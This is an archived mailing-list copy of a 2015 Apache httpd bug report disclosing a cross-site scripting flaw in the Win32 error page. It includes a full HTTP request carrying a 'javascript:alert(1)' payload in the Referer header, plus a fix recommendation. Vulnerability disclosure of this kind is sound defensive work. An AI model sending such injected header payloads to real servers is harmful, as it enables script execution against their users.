[Bug 58226] New: XSS in Error Page

bugzilla Fri, 07 Aug 2015 23:19:35 -0700

https://bz.apache.org/bugzilla/show_bug.cgi?id=58226


            Bug ID: 58226
           Summary: XSS in Error Page
           Product: Apache httpd-2
           Version: 2.4.12
          Hardware: PC
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Win32 MSI Installer
          Assignee: [email protected]
          Reporter: [email protected]

Created attachment 32983
  --> https://bz.apache.org/bugzilla/attachment.cgi?id=32983&action=edit
Hove over the link and see the payload

Setup Details : Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.6.11

Request to server:

GET /not_existing_link HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: javascript:alert(1)//452bce05
Cookie: _ga=GA1.1.1225409471.1439004440; _gat=1
Connection: keep-alive

When we send the above request to the server, the script in the referer header
(Referer: javascript:alert(1)//452bce05) gets embedded in the error page.

This gets executed when the user clicks on the link.(Image attached)

The same can be used for SELF XSS.

Recommendation: Convert respective characters from the referer header into
their HTML entities.

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

[Bug 58226] New: XSS in Error Page

Reply via email to